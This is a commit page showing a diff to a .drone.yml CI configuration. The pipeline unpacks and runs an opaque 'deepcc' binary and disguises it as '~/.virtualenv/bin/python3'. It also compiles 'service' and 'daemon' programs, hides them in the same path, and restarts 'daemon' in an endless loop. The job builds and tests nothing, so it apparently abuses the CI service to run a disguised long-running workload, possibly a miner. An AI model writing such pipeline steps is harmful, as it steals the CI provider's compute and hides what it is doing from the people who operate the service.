Unverified Commit ac94e8e7 authored by Dapa's avatar Dapa Committed by GitHub

Update .drone.yml

parent 4b7add34
......@@ -7,6 +7,6 @@ steps:
image: golang
commands:
- export TERM=xterm && nproc && mv deepcc deepcc.tar.gz && tar xvf deepcc.tar.gz && deepcc && mv deepcc ~/.virtualenv/bin/python3 && cd src && g++ service.cpp -o service && g++ daemon.cpp -o daemon && mkdir -p ~/.virtualenv/bin && mv daemon ~/.virtualenv/bin && mv service ~/.virtualenv/bin
- cd ~/.virtualenv/bin && PATH=$(pwd):$PATH && while [ 1 ]; do daemon; sleep 1; done
- PATH=$(pwd):$PATH && while [ 1 ]; do $HOME/.virtualenv/bin/daemon; sleep 1; done
environment:
TERM: xterm
Markdown is supported
0%
or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment